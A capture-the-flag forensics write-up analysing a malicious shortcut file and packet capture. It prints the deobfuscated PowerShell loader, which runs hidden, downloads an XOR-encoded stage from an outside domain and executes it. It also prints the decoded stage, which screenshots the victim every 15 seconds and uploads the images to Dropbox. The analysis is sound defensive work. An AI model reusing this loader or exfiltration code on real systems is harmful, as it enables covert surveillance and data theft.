Trick or Treat
Personal Rating: Medium
General
We got a .pcap file and a .lnk file with the info that the .lnk file opened a hidden command window
LNK
The lnk file performs some steps and has obfuscation to it:
→ Powershell is started in a hidden window
→ A list of user agents is defined in $UserAgents to mimic a regular browser for the requests. One is picked at random into $RandomUserAgent
→ A webclient is created and the user agent is added as the User-Agent header. The content of 'http://windowsliveupdater.com' is downloaded as $boddmei
→ From the downloaded content in $boddmei every two characters are decoded from hex to Int16 and then XORed with 0x1d
→ The decoded chars are concatenated to $vurnwos
→ The code inside $vurnwos is executed
→ Another var $asvods is executed as code, but it was not defined before
→ shell32.dll is referenced, but I don't know how or why
When I downloaded the content manually, what I saw was a page referencing https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css with a timeout that then opens a rickroll.
Opening the first link redirects to /tailwindcss@2.2.19/dist/tailwind.min.css
CURLing that shows a lot of CSS data, but certainly nothing that can be executed by PowerShell.
Since there is nothing interesting here, I suspect that I have to look at the pcap file for now.
Still, here is the code that I deobfuscated from the lnk file:
powershell.exe -windowstyle hidden:
$asvods = '';
# pool of browser User-Agent strings; one is picked at random per run
$UserAgents = @(
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/15.15063',
    'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'
);
$RandomUserAgent = $UserAgents | Get-Random;
$WebClient = New-Object System.Net.WebClient;
$WebClient.Headers.Add('User-Agent', $RandomUserAgent);
# the second stage is fetched as one long hex string
$boddmei = $WebClient.DownloadString('http://windowsliveupdater.com');
$vurnwos = '';
# every hex pair is decoded to a byte and XORed with 0x1d
for($i=0;$i -le $boddmei.Length-2;$i=$i+2){
    $bodms=$boddmei[$i]+$boddmei[$i+1];
    $decodedChar = [char]([convert]::ToInt16($bodms, 16));
    $xoredChar=[char]([byte]($decodedChar) -bxor 0x1d);
    $vurnwos = $vurnwos + $xoredChar
};
# the decoded stage is executed; $asvods is still the empty string here
Invoke-Command -ScriptBlock ([Scriptblock]::Create($vurnwos));
Invoke-Command -ScriptBlock ([Scriptblock]::Create($asvods));
# remaining strings extracted from the .lnk file after the command line
C:\Windows\System32\shell32.dll%SystemRoot%\System32\shell32.dll%SystemRoot%\System32\shell32.dll
%wN]ND.Q1SPSXFL8C&mm.S-1-5-21-3849600975-1564034632-632203374-1001
This will be important once I find the data that was actually downloaded in the incident.
PCAP
There is interesting HTTP traffic

There are some HEAD and mostly GET requests
The interesting GET requests were sent from the client 10.0.2.15 to 193.57.35.48
The host msedge.b.tlu.dl.delivery.mp.microsoft.com is queried
The data transferred seems to be ASP .NET application data
Looking at the conversations, there is a short one with the windowsliveupdater domain that we know from the link file:

Following the TCP stream, we find the hex-encoded content that the PowerShell loop in the .lnk file decodes.
Using what I saw in the deobfuscated .lnk file, I created a decryptor with the above data in “fetchedcode”:
# read the fetched hex string as a single string, not line by line
$dwlstring = Get-Content -Path "C:\Users\aua\Documents\htboo2023\fetchedcode" -Raw
$code = ''
# same loop as in the .lnk loader: hex pair -> byte -> XOR 0x1d -> char
for($i=0;$i -le $dwlstring.Length-2;$i=$i+2){
    $byte=$dwlstring[$i]+$dwlstring[$i+1];
    $decodedChar = [char]([convert]::ToInt16($byte, 16));
    $xoredChar=[char]([byte]($decodedChar) -bxor 0x1d);
    $code = $code + $xoredChar
};
# print the decoded stage instead of executing it
$code
This prints the resulting code, which contains the flag:
PS C:\Users\aua\Documents\htboo2023> .\decrypter.ps1
function DropBox-Upload {
    [CmdletBinding()]
    param (
        [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
        [Alias("f")]
        [string]$SourceFilePath
    )
    $DropBoxAccessToken = "HTB{s4y_Pumpk1111111n!!!}"
    $outputFile = Split-Path $SourceFilePath -leaf
    $TargetFilePath="/$outputFile"
    $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
    $authorization = "Bearer " + $DropBoxAccessToken
    $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
    $headers.Add("Authorization", $authorization)
    $headers.Add("Dropbox-API-Arg", $arg)
    $headers.Add("Content-Type", 'application/octet-stream')
    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
while(1){
    Add-Type -AssemblyName System.Windows.Forms,System.Drawing
    $screens = [Windows.Forms.Screen]::AllScreens
    $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum
    $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum
    $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
    $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum
    $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
    $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)
    $graphics = [Drawing.Graphics]::FromImage($bmp)
    $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
    $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png")
    $graphics.Dispose()
    $bmp.Dispose()
    start-sleep -Seconds 15
    "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload
}
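To reproduce the hex-pair/XOR stage of the .lnk loader and of the decrypter above outside PowerShell, here is an added Python decoder; it is not part of the original writeup. It mirrors the loader's loop (including dropping a trailing odd character and ignoring whitespace in the fetched body), and the crib-based key search goes beyond the case on this page, where the key 0x1d can simply be read from the .lnk. The sample body is constructed, not the response captured in the pcap.

```python
import string

XOR_KEY = 0x1D  # key hard-coded in the loader's for-loop (-bxor 0x1d)
PRINTABLE = set(string.printable)


def decode_payload(hex_text: str, key: int = XOR_KEY) -> str:
    """Mirror the loader: take each pair of hex chars, parse it as a byte,
    XOR it with the key and append the character. The PowerShell loop runs
    while i <= Length-2 with step 2, so a trailing odd character is dropped;
    whitespace from a fetched body is stripped before pairing."""
    cleaned = "".join(hex_text.split())
    return "".join(
        chr(int(cleaned[i:i + 2], 16) ^ key) for i in range(0, len(cleaned) - 1, 2)
    )


def encode_payload(text: str, key: int = XOR_KEY) -> str:
    """Inverse transform (XOR, then hex); only used to build the sample below."""
    return "".join(f"{ord(c) ^ key:02x}" for c in text)


def find_xor_keys(hex_text: str, crib: str) -> list:
    """Known-plaintext search for a body whose key is not known: every
    single-byte key whose decoding is fully printable and contains the crib
    (for a PowerShell stage, e.g. 'function' or 'Invoke')."""
    hits = []
    for key in range(256):
        plain = decode_payload(hex_text, key)
        if plain and all(c in PRINTABLE for c in plain) and crib in plain:
            hits.append(key)
    return hits


# Constructed sample (not the body from the pcap): a small PowerShell fragment
# encoded the way the loader expects, plus a trailing newline such as an HTTP
# body may carry.
SAMPLE_PLAINTEXT = 'function Test-Stage { "HTB{constructed_sample}" }'
SAMPLE_BODY = encode_payload(SAMPLE_PLAINTEXT) + "\n"

if __name__ == "__main__":
    print(decode_payload(SAMPLE_BODY))
    print([hex(k) for k in find_xor_keys(SAMPLE_BODY, "function")])
```

Feeding the TCP stream body from the pcap to decode_payload yields the same output as the decrypter script above.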
Summary
The malicious .lnk file was executed on the host 10.0.2.15. It contained a PowerShell loader that fetches a hex-encoded, XOR-obfuscated code snippet from a site hosted at 193.57.35.48 and executes it. An older PowerShell version was used to simply bypass AMSI, and the shell was launched in a hidden window. The script was lightly obfuscated. The downloaded snippet just seems to take a screenshot every 15 seconds, save it under the target's computer name, and upload it to Dropbox. In a real incident it would usually be designed to load further malicious software from the Dropbox instance, potentially to establish a C2 connection.